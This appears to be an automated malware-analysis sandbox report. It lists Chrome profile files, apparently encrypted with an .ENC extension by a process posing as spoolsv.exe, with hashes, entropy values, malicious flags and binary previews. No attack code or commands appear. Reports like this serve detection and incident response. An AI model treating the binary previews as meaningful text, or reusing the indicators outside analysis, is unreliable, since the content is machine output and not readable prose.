                                                                                                                                                                                                                                                      SHA-256:971C1D9CB490C2100654763CCB68E021CEAF307786ACBC54AB8B5E870528FF55
                                                                                                                                                                                                                                                      SHA-512:C1BB33C8AD522EABC58BD7DC564ABB99FE2D6F3F5B839AF5CBBE2C31CDDCBF2D543625D5E0D8741C06CCF8CACF58B33DFDA9CBAEEBAC72F03182F4B882F0CF7B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:O4'|."c.V...}.j..V!.5.c..:..E..}O..*.....nv..}...*k.f...q....mUe$4..~.G...M.-]......V.i.s....o..hRQ.........nc...q.xb.rNg.....K..6.R....9u.:.*...... ..;...#.......wb....ia.Z....sy.m...........J=.-.5.K9..hu.:.;*u...A$...<u.#..<......_>._.m..n.v..rH......C.|...s$.P...h3..T..v..../|U...!~9...s".d...w..S...D...y......R..Ws..5...X..9T.(.e..N....Q....x.].....~E........h.0.`~..u:Z@?w...m....Y...0..3..W.........\....]....AR.73T9....H...~..7Z..Y`cI.B.9.LZ.]....:.I.g#...4.@...fa.....~;L.......7.8.R.5E.5g.....)w...........|.>......|.&;.G!.....6.-...oD\!.[..~....,|n.%._.l:..p.w..bF.O@......Q..MZn%..="B,..:./.ZJi>&#.c3j.O.M.f.....fhH;.....A.......0}b......` .C..0?...bU....ZX.b&..B2w9..8..%...>A..O..Y..w.U.Z.G.....?..[]|....M.rs..r..$.._U..k...Yb...[I..+......i_!n'o.d....^..Y...3.Bu..C..f...U.y..y.&c...\.(9ZG$B(.....w.....^}..g!.......uE..=SQJm..z...Kv.P....iu.i.F.G.P.#y.Z.J......@..)$..}.^...t.f.+........SJ....a~]b......m;.........Y..XLj9.d_5.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_3.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.9802964289991625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:cMysjkwUFxfDdZ8iQPD5V/6ZukJ8TDs2KPTBpk:9zAwcrdZ8iODb//kxjk
                                                                                                                                                                                                                                                      MD5:87BE137E9899697BC7B4F1817E491560
                                                                                                                                                                                                                                                      SHA1:61A6C3AB74475A3888BEC9EB379C5D2C000F4461
                                                                                                                                                                                                                                                      SHA-256:8CD873DD292A600FFEE0D755474E11248CEBEA2BD21E5CDF99F54E55B84C0545
                                                                                                                                                                                                                                                      SHA-512:12C722F981BF9A7554BF26559D9CC2FD8B32A2F534953AB65CAB7FB5D8130FF3ECD0FA828346B66D670B3BC3A70906E41944F4C87FF533FCFA71C09DAF703A8A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:OK.c...\O.:..!.......!..A..G.LnHv.P.$.K+).Q.......PL..M$HGP...K$.h..j....u.f..MZ.3................^Z>:..<.G.....<...@.H.B..........K3.?$.].B.?...'iiR+.)``P.G...N..!.|x........t.2#,.A......3...-..e0.x...Db.#A.6....._...../..-..V.W..|&..=._.>-,Q.!&.l...".....J.y....r..i.v...q[.a@{.h.o..%...Z.t.ly...1Q..7.B2...B.......'..}..J.....C#....Q2....W".D.."...M..K.5g<":...2n8!...B.e EK.I....5..,..'...V..;..(^.6.w..=.q.D.g.b2SSe/k[B....b.'..kF....`?x..3X......Sc"i.....tU..H.......Yw...LR).a.[t.....:8.j.i......i<.i..:...k......9.`7...~M.2c.L....)..8....u.?.0J..j.?[.S...C2..u.q...)...5Z.Ss.q.>..&...1....h-.I..?.lY.V.Y+h....2LG..D...-hP...._..0...r.....G.!....?. }.u..wR.....,..&0.....3.oY..9........iP..W...S....|.......P...........f....1......k....+.4.3..Ka....H.x.,..%&...V...4)}.r.M...H..-.2.......m..c..c.,..]..h$..O(.2)...U..4.."..../l.\\!~..`.ZX.....R.....a.....S.....N.DX.;.Q..$F.$_5.E.P"......mPG.R.1.4.n...e.....s....vt.[I^`..#P...N...4.;.4.\#4l

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\index.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):262528
                                                                                                                                                                                                                                                      Entropy (8bit):7.999449943882263
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:HrM977jGF4QkANSWWFs7/Wnrvw17B+ymHXCd6bzm5:LwRjWWFs7/WnrQ+ymy0zm5
                                                                                                                                                                                                                                                      MD5:2A50336FF3F0D52D3F4D37CE96342785
                                                                                                                                                                                                                                                      SHA1:858127F0AAF93CE9C7154D2A59246CA27021D5C2
                                                                                                                                                                                                                                                      SHA-256:B7C5CC7E2BB33D9F812874357FA0C733C07AB0A6A40BF543E536D7E09F8E62C0
                                                                                                                                                                                                                                                      SHA-512:8934CC9A6E71797601483380D8D2861ADE798FDD129FF54B5A57366D7B89F6827B41D7DCC2F3D2C15E753970FA9AF8F90D77D66445EFC1CCF51CBE7852FB55E4
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:)]w.p.......~..e.M.....=.G...A.............u...5*.K..x..Qv......F.Rv...JwU..q.E..g...y..f..}...2..&s(...Hs..;..+TC..y?...A.[1yE..k..[..$aq...D..:.e.`.\j.7......;.......s.........m_a.~#.R0.......K.0.....i.`....t./..b.y-.;..J....O.....j....7W.Gj;yW=....X...k......~y+.....v......b......=./@z...4ar..^....$8..,.#...Dl.:.....=.f.n..|...N......12.4.x....a.o..ulU. =P...E.8A!.u7.P...]....},=.@..k...!;>$s.....x...3.2.b...U.4..**.C.t.w.{..q.7.I...&./M..5j.a..+b.......B...@.U......3Ip'..:D3.44H.....z.y:l......F...b;u.I\...v3-...A...+.N.p.........9...c....*......<..i.Q..<...vK.y..`..a..[.@....M......6.Ma...O...l..tY...}.`n..n......c...?Q.Y.u.n......s..{.......9U?...j.M7..W....H'.R4q....\}.<.#...#l...../u}..9.>..c......i'..L..i?w...F...../g..Q....l..U(..)~.._....'.'.U.;:c>.;.x.......)....d..<...C.t.dt`....D.R...@.&+.B...F.4..+.._.L...p.8...[...[...].....a...8..$.'.8p.Y.^@1..CZ..3o.2...Z.akO*m..|YG...(x.......EL.^ ....o.#BIJ`?...9>_.$.-E.e..\".T...w..ZT

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20496
                                                                                                                                                                                                                                                      Entropy (8bit):7.9904383677157345
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:NBUdAJYlt0v/+reI+LKpH52+BC13f1kqFkC1t7mJCpe1OKg9Nb4avDtcAMUCP3L:NquJYIvtNLK52+BCVf1v7/R9RvvhcZUw
                                                                                                                                                                                                                                                      MD5:535D1F211CEFABB716D11EC1CA03EE43
                                                                                                                                                                                                                                                      SHA1:9FD22B380747613308209AF8E3222F0C2AA7B66C
                                                                                                                                                                                                                                                      SHA-256:CA32565DB6B2D09A4E2DC88F58B17916569F11BE714AAEEE46B4C565B618F95F
                                                                                                                                                                                                                                                      SHA-512:30E26090ADB54B14252D79C23C09A8612B34E68E75051F33F8171433A0E3727C0A9B47CC2D624BDE86D6F69227F81457FD77D9A5ECC6A05429C1B07011AF0ACC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:rS7n2.*.........|y..G..|.M...C..2ns.M.........(...b..T......~....3.w..d..`...K........b.......{...s3f.....}....B'e..u.G.....b$V....tFY.|d...3S..`)...R..-.M..V.S5.Q)....Q.......?'...V#...2.w~.W.Z....r..(.].0.C..nU.._-A.[.;:.!...Z9..XE.c...?.....P.H+3!c.,.{...-.+.Xhs.I.!..m~.=(.{..\.t.n..D....#.AC.....:.....Y..lZ....~.?]..(.....@.G9..%.....a.c7[<x[3M...C>..S.).#...w.<Gk%+.v..d.N...$.w.k.z..l.Z....|(IE.v.5b....&J".<.....o...U)T>8.....$..f......3_.....TS.8O....Q...g....F.....pV.c~..@..m..8Y...HwV^..q.....S...'..Fg@..$..V..O*...iOz"{.vQ|K4n..h.....:<h..:.......:...^.O......?kJ`!r....cSl.;..@..f".....R..T7QL..V4.O.l.6j..ng./..]K.........k..&g.`?.W....k.;..R.=...R..sI.r.CAMI..[.2.Y...k.X}\..p.5@.y2;*......<...,.kn@...k...vl.0.Z..Q....Y..e.[.2@....d.T.k..t...0.y@W..X...yh.YR.l.p.........K.g..m.e1k.v.%...i....pS.]..{...!.h....U.@.b.c.nGl6.q....../`$}.......i..a.N.....o..z.#.MO. }.....@.B......@.'lw....%=..-.Fn...]....&.<...k...^.f..k.g

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):160
                                                                                                                                                                                                                                                      Entropy (8bit):6.751401766667714
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Nle5pHnPWvPkLMBekZR8sseQ4BXN6QhjOLsdhBt3inLx37/n:NlAHnI84BekVmUN8Sho9n
                                                                                                                                                                                                                                                      MD5:14E239F827D7D32AC7BC02F8CDFA6109
                                                                                                                                                                                                                                                      SHA1:B6B573171183B53D4369058C2CCFAB65E193D488
                                                                                                                                                                                                                                                      SHA-256:E7CF69D1C1FFBF441017BC439C26883F620BB912FB4FA9E401BFE09536A56B6D
                                                                                                                                                                                                                                                      SHA-512:5644FFE86B85DD91CFA95C25A6DF3DED11B2F879C76D4A8D884A501D4EA2628DD3123B55BE4CDA84C00D2393A2F3A4C38682407E521310E7C693C33B5AFB552D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:W.s.].."{......a.w._..ovj,........6a!....ih6LU...t......?...F.\k..5n.]'x...}r..O...f.Y.d..-_.DW.U.RQR...|....+.....R?i.>...{..N.:.$......_...a.....=w...w)

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.321951090971487
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:g+vFRLKXaa+vOMe24kKrtwkjMd9Xucg9C9LFLkF4lPT83PPwq:jKKBvOp24kK/I9Xuj9igF4lPw/oq
                                                                                                                                                                                                                                                      MD5:5D1F666106D117398C8605C2D9A84031
                                                                                                                                                                                                                                                      SHA1:FC9CBFCA8B3A7F7F07F2337AC7D364C5BA15B27B
                                                                                                                                                                                                                                                      SHA-256:C11C9CCBDF3E9497E4EB0CE515ECA0D780965C761852BB5C0FB1E43A80F2657A
                                                                                                                                                                                                                                                      SHA-512:003E4A387B343FBB3455D08C39580A5E9EA968D8697B9A36E0E6F2818FC6F89C71230F85DAF74260CA19C690D9E6C92BEB8FE69363E84869A9D62CD791D8E0F9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:ks...jx.J.8*.!.....N7<.....J.. .....V.R.u$.4W._.b..c.3.u..u......v2."..u..=u.qG%!..w..E..&.a3H.c].f..p.....6s......f....-.f3.6ft.P..04..s.[....<KW....3N........$d9..-.v.u.2.<.HF3.c......B.,..{2A.S.M...Ki@...J..YF..?v5G...k.1.m.5U...0.rH.'.....C....I....4$UZ.R ..3.......7l...KI...dv...3...b.l..7yc..%.M....'. 7.{..}9.l...m. .l

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):160
                                                                                                                                                                                                                                                      Entropy (8bit):6.751401766667714
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Nle5pHnPWvPkLMBekZR8sseQ4BXN6QhjOLsdhBt3inLx37/n:NlAHnI84BekVmUN8Sho9n
                                                                                                                                                                                                                                                      MD5:14E239F827D7D32AC7BC02F8CDFA6109
                                                                                                                                                                                                                                                      SHA1:B6B573171183B53D4369058C2CCFAB65E193D488
                                                                                                                                                                                                                                                      SHA-256:E7CF69D1C1FFBF441017BC439C26883F620BB912FB4FA9E401BFE09536A56B6D
                                                                                                                                                                                                                                                      SHA-512:5644FFE86B85DD91CFA95C25A6DF3DED11B2F879C76D4A8D884A501D4EA2628DD3123B55BE4CDA84C00D2393A2F3A4C38682407E521310E7C693C33B5AFB552D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:W.s.].."{......a.w._..ovj,........6a!....ih6LU...t......?...F.\k..5n.]'x...}r..O...f.Y.d..-_.DW.U.RQR...|....+.....R?i.>...{..N.:.$......_...a.....=w...w)

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.9375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QRzgTczBv:Q5d
                                                                                                                                                                                                                                                      MD5:328FC1F4C693CE30D6A0FB47D34D59E3
                                                                                                                                                                                                                                                      SHA1:A49BAAFDEFA3CE958AA56709FF598FBA601A8798
                                                                                                                                                                                                                                                      SHA-256:F6F0E310BCA7FD98AA03FE19DDCBB88434AFBBBC51A64774405F82DD457CBA2B
                                                                                                                                                                                                                                                      SHA-512:B1CF96413C6D8BEB6D3A6D26CCA9068DF4B7EAD78D4C0E7454AC7D4B938BA49311B060A6C7B8277C7A8A667C6A9A674C0063EA05EAA2F205F110ADB9534A28BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...Y.4.t*..V.h=.#..x..k..Y.$.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG.old.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.4089214032081845
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:MS4HtH1SUG5bM7DTz0e6KvRgI0xVd1yA6MfVV+0oUpumTB+6v3t8yBNtw7N:MNBG2YeRLu2MurK9+yt8yBNQ
                                                                                                                                                                                                                                                      MD5:5978C492DC974DD98BEFCA096E07C8E5
                                                                                                                                                                                                                                                      SHA1:985BFA06C5FC5871D06DA1AF27573EB0533A1D4A
                                                                                                                                                                                                                                                      SHA-256:22DDC687A5B0F37E2E4D9889F058590E16E90A63FB66E3DDDD8AA6A3D967FBBA
                                                                                                                                                                                                                                                      SHA-512:F44F9408A8730DEEEEB108FE04E523ED5D6C544DFAFBB773560B0ADF7B86175E8D167DF4FB57ED548307B254E5B92E45B27BE7DA50742C4201F536F24503D85E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:T......P...Kk&.{&.p.....E5..[...q.S&{......._`Mq....;.>D.k.W.,..-..>$..x..j... .t...@......6v.......]A...~..v@.J.A...i"...4..p.....B...1).jx.......h..aW6.3._...[F..cZ...oKc1R/...H.8..B..=.P.Fq.R/..3..VAz"..6.*...B...Cy.`V...LW.....t.^H.?.#7f.....:.a{a(...NU.>.CqN5.........J.~2..}....L..._@..nu.OLcV...%.~.I.T.Ht4.h

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.543295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:qb0z5ZjCY:+aH
                                                                                                                                                                                                                                                      MD5:00B5963CADCB5E972047846E44EE2632
                                                                                                                                                                                                                                                      SHA1:3741D074C652E62798A616ED56C811482AF90C65
                                                                                                                                                                                                                                                      SHA-256:AD5D4ADA9FA65FCFCC5B74692628D26993377029E512DC6FC103A8819650AD66
                                                                                                                                                                                                                                                      SHA-512:ACC0812854372F9CE7AE2854D5EDB6D4B02D820E275524CEDA2329495CCE7D0CB3E8455A426E67BBBAA8CA2F5C1701D68FF1444DD0318EEE647717EC264B308E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...P...`&)....Y..R.r...........yT.?.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                                                      Entropy (8bit):7.549049537229619
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:NlAHnI84BekVmUN8SholkF1t1C5/BpiiuK9kQRuEJY9CG7yKSfi2N/Ln9w4ABLw0:8/4OUNhkFPiHK9kQR7YyFxwPX
                                                                                                                                                                                                                                                      MD5:CAE6C56E30EE83DB2A99D81E7E1D23BB
                                                                                                                                                                                                                                                      SHA1:6914DEB85D144173541B1FDA0ADA7C0A7DD7E15B
                                                                                                                                                                                                                                                      SHA-256:8BED6FD176B9F1214C16DAC79259689CE3BF1DC6612EDEACBFD794395B98A059
                                                                                                                                                                                                                                                      SHA-512:AD95ABCFFB6BBAB849BC044A55C6F30E22DE3BD50FB1D0D99E230C8D864E32322F209833D3FB4A7EB6FA93C574DF1658F719F6C87918F601656AB2E735C61357
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:W.s.].."{......a.w._..ovj,........6a!....ih6LU...t......?...F.\k..5n.]'x...}r..O...f.Y.d..-_.DW.U.RQR...|....+.....R?i.>...{..N.:.$......_..6..j......|...a.>....W..SPW..J...o........f"..=.8.,.....g.JBk.b?<..$.,.(P.}.R....ler3....#)Fv....,..=}.E..W.v.....A.....$...d...D..Z..x.kYr........U..3f...c7.Ns..U.lK....f.+.'....".'#....h,.KH.`.[B.Ec./....D...J....j..q...`.Y...l...6/_.&.#n......u......<...nv.{.o5.)..Q0.~q....Wl.m.X..fC;q,.U.....?.9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):336
                                                                                                                                                                                                                                                      Entropy (8bit):7.344128928811315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:mqwvN/g5EY1+0qVNxT3N97XXvVqmaMs9Xkjr/KUo9IrL8IqeFO7ben:Cg5EY1+r3NN9rXEp/tqoIrth5
                                                                                                                                                                                                                                                      MD5:77F124F9D75A1BC9DF29737ABBC415D9
                                                                                                                                                                                                                                                      SHA1:18D3B314EC070F310A09F56B7A0800216D67E1C3
                                                                                                                                                                                                                                                      SHA-256:4FFA2ECDE4BEDA70D475527ADC64933A65A492A2C3C0C239829FA6A283B1E95D
                                                                                                                                                                                                                                                      SHA-512:9161727B4D4144CF5CD94AA03335D4869F02B0C90BA2CEBF0773D1B817C993D23D1041A2FD3F9405BA1E956CA3A73A38FD8F35B8B8B380642004426E45FF45A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<....|......}...L7w.<Y.2.X..... a...R..\.d.y.>..Z.Z..!..W..>.[+..%.mJ .g.'^.....R."s..tF.D.O....0.t..oj_p.l..a...n$h.^]J..V...RZ.UY\.N..6r.=+....^8.6B..g.*=..RY..N.,.D9.-.....u....tk..N..t.b.m..A?qCA.j..r_........FO#.f(N..$..L...*..v<a.z.j:XtEU..).~.,]q...d.`N\...h.A\V..O-...Ih..L+<.tM?.L.*.@.l.g.Y......y1.(...Y+...e

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001.ENC

                                                                                                                                                                                                                                                      Download File
